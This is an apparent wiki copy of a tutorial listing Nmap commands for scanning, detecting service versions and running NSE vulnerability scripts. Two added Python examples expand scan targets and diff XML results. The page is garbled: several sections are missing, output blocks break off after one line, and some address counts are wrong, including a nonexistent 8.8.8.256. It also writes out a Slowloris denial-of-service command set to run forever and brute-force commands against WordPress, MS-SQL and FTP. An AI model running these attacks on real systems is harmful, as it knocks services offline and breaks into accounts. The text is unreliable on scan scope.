Nmap:Penggunaan: Difference between revisions
===1. Basic Nmap Scan against IP or host===
{{Terminal|nmap 1.1.1.1}}
Now, if you want to scan a hostname, simply replace the IP with the hostname, as you see below:
{{Terminal|nmap cloudflare.com}}
Scans like this, such as the Nmap host scan, are perfect first steps when starting with Nmap.
===2. Nmap Ping Scan===
{{Terminal|nmap -sn 192.168.5.0/24}}
The most famous type of scan is the Nmap ping scan (so-called because it’s often used to perform Nmap ping sweeps), and it’s the easiest way to detect hosts on any network.
===3. Scan specific ports or scan entire port ranges on a local or remote server===
{{Terminal|nmap -p 1-65535 localhost}}
In this example, we scanned all 65535 ports on our localhost computer.
Nmap is able to scan all possible ports, but you can also scan specific ports, which will report results faster. See below:
{{Terminal|nmap -p 80,443 8.8.8.8}}
===4. Scan multiple IP addresses===
Let’s try to scan multiple IP addresses. For this you need to use this syntax:
{{Terminal|nmap 1.1.1.1 8.8.8.8}}
You can also scan consecutive IP addresses:
{{Terminal|nmap 1.1.1.1,2,3,4}}
This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4.
===5. Scan IP ranges===
You can also use Nmap to scan entire CIDR IP ranges, for example:
{{Terminal|nmap 8.8.8.0/28}}
This will scan 14 consecutive IP addresses, from 8.8.8.1 to 8.8.8.14.
An alternative is to simply use this kind of range:
{{Terminal|nmap 8.8.8.1-14}}
You can even use wildcards to scan an entire class C IP range, for example:
{{Terminal|nmap 8.8.8.*}}
This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256.
If you ever need to exclude certain IPs from the IP range scan, you can use the “<code>--exclude</code>” option, as you see below:
{{Terminal|nmap 8.8.8.* --exclude 8.8.8.1}}
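As an added check on the target syntax used in sections 4 and 5 (editorial example code in Python, not from the original page or from the Nmap project), the following expands Nmap-style target specifications the way Nmap itself does: a CIDR block includes its first and last address (so a /28 is 16 addresses, .0 through .15), a <code>*</code> octet runs from 0 to 255, comma lists and dashed ranges work per octet, and <code>--exclude</code> entries are removed after expansion. Hostnames are passed through unexpanded; the hostname handling and the function names are this example's own.

```python
from __future__ import annotations

import ipaddress
import itertools
import re


def _octet_values(spec: str) -> list[int]:
    """Expand one octet of an nmap target: '5', '1-14', '1,2,3', '*' or '200-'."""
    values = set()
    for item in spec.split(","):
        if item == "*":
            item = "0-255"
        if "-" in item:
            lo, hi = item.split("-", 1)
            lo, hi = int(lo or 0), int(hi or 255)  # open-ended ranges are allowed
        else:
            lo = hi = int(item)
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad octet spec {spec!r}")
        values.update(range(lo, hi + 1))
    return sorted(values)


def expand_target(spec: str) -> list[str]:
    """Expand a single nmap target spec into IPv4 addresses (hostnames pass through)."""
    if "/" in spec:
        # nmap masks the given address and scans every address in the block,
        # including the network and broadcast addresses (so no .hosts() here).
        net = ipaddress.ip_network(spec, strict=False)
        return [str(a) for a in net]
    parts = spec.split(".")
    if len(parts) != 4 or not all(re.fullmatch(r"[\d,*-]+", p) for p in parts):
        return [spec]  # not dotted-quad syntax: treat it as a hostname
    octets = [_octet_values(p) for p in parts]
    return [".".join(map(str, combo)) for combo in itertools.product(*octets)]


def expand_targets(specs, exclude=()) -> list[str]:
    """Expand several specs and drop every address covered by the --exclude specs."""
    excluded = {a for e in exclude for a in expand_target(e)}
    out = []
    for spec in specs:
        out.extend(a for a in expand_target(spec) if a not in excluded)
    return out
```

Running <code>expand_targets(["8.8.8.*"], exclude=["8.8.8.1"])</code> yields 255 addresses, which is a quick way to confirm the scope of a scan before it is launched.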
===6. Scan the most popular ports===
Using the “<code>--top-ports</code>” parameter along with a specific number lets you scan the top X most common ports for that host, as we can see:
{{Terminal|nmap --top-ports 20 192.168.1.106}}
Replace “20” with the desired number. Output example:
{{Example|Output Terminal}}
[root@securitytrails:~]nmap --top-ports 20 localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-01 10:02 EDT
Let’s suppose you create a list.txt file that contains these lines inside:
{{Example|File .txt}}
192.168.1.106
cloudflare.com
The “<code>-iL</code>” parameter lets you read from that file, and scan all those hosts for you:
{{Terminal|nmap -iL list.txt}}
===8. Save your Nmap scan results to a file===
On the other hand, in the following example we will not be reading from a file, but exporting/saving our results into a text file:
{{Terminal|nmap -oN output.txt securitytrails.com}}
Nmap has the ability to export files into XML format as well, see the next example:
{{Terminal|nmap -oX output.xml securitytrails.com}}
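The XML format is the one to keep when scans are repeated, because it can be diffed. Here is an added Python example (editorial code, not from the page or from the Nmap project) that parses <code>-oX</code> output and reports ports that are open now but were not open in an earlier baseline scan of the same network; the two documents are constructed samples in the shape Nmap writes, trimmed to the elements the parser uses, and the addresses and services in them are made up.

```python
import xml.etree.ElementTree as ET

# Constructed samples in the shape `nmap -oX` writes, trimmed to the elements
# used below; they are not real scan output.
BASELINE_XML = """<nmaprun scanner="nmap" args="nmap -oX baseline.xml 192.168.1.0/24">
<host><status state="up"/><address addr="192.168.1.106" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
<port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
</ports></host></nmaprun>"""

CURRENT_XML = """<nmaprun scanner="nmap" args="nmap -oX current.xml 192.168.1.0/24">
<host><status state="up"/><address addr="192.168.1.106" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
</ports></host>
<host><status state="up"/><address addr="192.168.1.107" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
</ports></host></nmaprun>"""


def open_ports(xml_text):
    """Map each up host's IPv4 address to its set of (proto, port, service) open ports."""
    inventory = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # hosts that are down carry no port data worth tracking
        found = set()
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # nmap also records closed/filtered ports; skip them
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            found.add((port.get("protocol"), int(port.get("portid")), name))
        inventory[addr.get("addr")] = found
    return inventory


def new_exposures(baseline_xml, current_xml):
    """Open ports in the current scan that the baseline did not have, per host."""
    base = open_ports(baseline_xml)
    changes = {}
    for addr, ports in open_ports(current_xml).items():
        added = ports - base.get(addr, set())  # a new host reports all its open ports
        if added:
            changes[addr] = sorted(added)
    return changes
```

For the constructed samples, <code>new_exposures(BASELINE_XML, CURRENT_XML)</code> flags 3306/tcp on 192.168.1.106 and the whole new host 192.168.1.107, which is the kind of change worth an alert when the scan runs on a schedule.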
===9. Disabling DNS name resolution===
If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the “<code>-n</code>” parameter.
{{Example|Output Terminal}}
[root@securitytrails:~]nmap -p 80 -n 8.8.8.8
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03
See the difference with a normal DNS-resolution enabled scan:
{{Example|Output Terminal}}
[root@securitytrails:~]nmap -p 80 8.8.8.8
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03
===10. Scan + OS and service detection with fast execution===
Using the “<code>-A</code>” parameter enables you to perform OS and service detection, and at the same time we are combining this with “<code>-T4</code>” for faster execution. See the example below:
{{Terminal|nmap -A -T4 cloudflare.com}}
===11. Detect service/daemon versions===
This can be done by using the <code>-sV</code> parameter:
{{Terminal|nmap -sV localhost}}
As you can see here:
{{Example|Output Terminal}}
[root@securitytrails:~]nmap -sV localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:28 -03
Standard TCP scanning output:
{{Example|Output Terminal}}
[root@securitytrails:~]nmap -sT 192.168.1.1
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03
UDP scanning results using the “<code>-sU</code>” parameter:
{{Example|Output Terminal}}
[root@securitytrails:~]nmap -sU localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03
Using Nmap scripts is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters:
{{Terminal|nmap -Pn --script vuln 192.168.1.105}}
Output example:
{{Example|Output Terminal}}
[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
In our previous example (#12) we found the host was vulnerable to Slowloris attack, and now we’ll try to exploit that vulnerability by launching a DOS attack in a forever loop:
{{Terminal|<nowiki>nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true</nowiki>}}
===15. Launching brute force attacks===
WordPress brute force attack:
{{Terminal|<nowiki>nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105</nowiki>}}
Brute force attack against MS-SQL:
{{Terminal|<nowiki>nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105</nowiki>}}
FTP brute force attack:
{{Terminal|nmap --script ftp-brute -p 21 192.168.1.105}}
===16. Detecting malware infections on remote hosts===
A common malware scan can be performed by using:
{{Terminal|<nowiki>nmap -sV --script=http-malware-host 192.168.1.105</nowiki>}}
Or using Google’s Malware check:
{{Terminal|nmap -p80 --script http-google-malware infectedsite.com}}
{{Example|Output Terminal}}
80/tcp open http
|_http-google-malware.nse: Host is known for distributing malware.
Today we covered the top fifteen Nmap commands to scan remote hosts, but there’s a lot more to discover if you’re starting to use Nmap in your OSINT strategy.
{{Note|The articles, tutorials and demos provided on Hackers Terminal are for informational and educational purposes only, and for those who are willing and curious to learn about Ethical Hacking, Security and Penetration Testing. Any time the word “Hacking” is used on this site, it shall be regarded as Ethical Hacking.}}
==Related==